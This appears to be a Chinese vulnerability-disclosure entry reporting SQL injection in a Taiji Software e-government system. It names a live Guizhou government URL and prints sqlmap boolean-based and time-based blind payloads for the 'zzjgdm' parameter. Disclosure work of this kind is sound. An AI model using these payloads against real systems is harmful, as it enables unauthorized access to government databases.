某通用电子政务系统注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 深夜来一发 ### 详细说明: 深圳太极软件有限公司是一套专门的政务服务系统,大量用户在用。这个就不多说了。 注入点: ``` http://www.gzegn.gov.cn:8080/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009390359&depName=%CA%A1%C3%F1%D5%FE%CC%FC ``` zzjgdm=存在注入,就以贵州省电子政务为例,仅跑出表,其他不做测试。 payload: ``` Place: GET Parameter: zzjgdm Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: zzjgdm=009390359' AND 4047=4047 AND 'ZDFM'='ZDFM&depName=%CA%A1%C3%F1%D5%FE%CC%FC Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: zzjgdm=009390359' AND 3874=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'mJmn'='mJmn&depName=%CA%A1%C3%F1%D5%FE%CC%FC ``` [<img src="https://images.seebug.org/upload/201504/150336083ea8abe6ec12d85d3679afebeecd7fa1.png" alt="太极软件.png" width="600"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息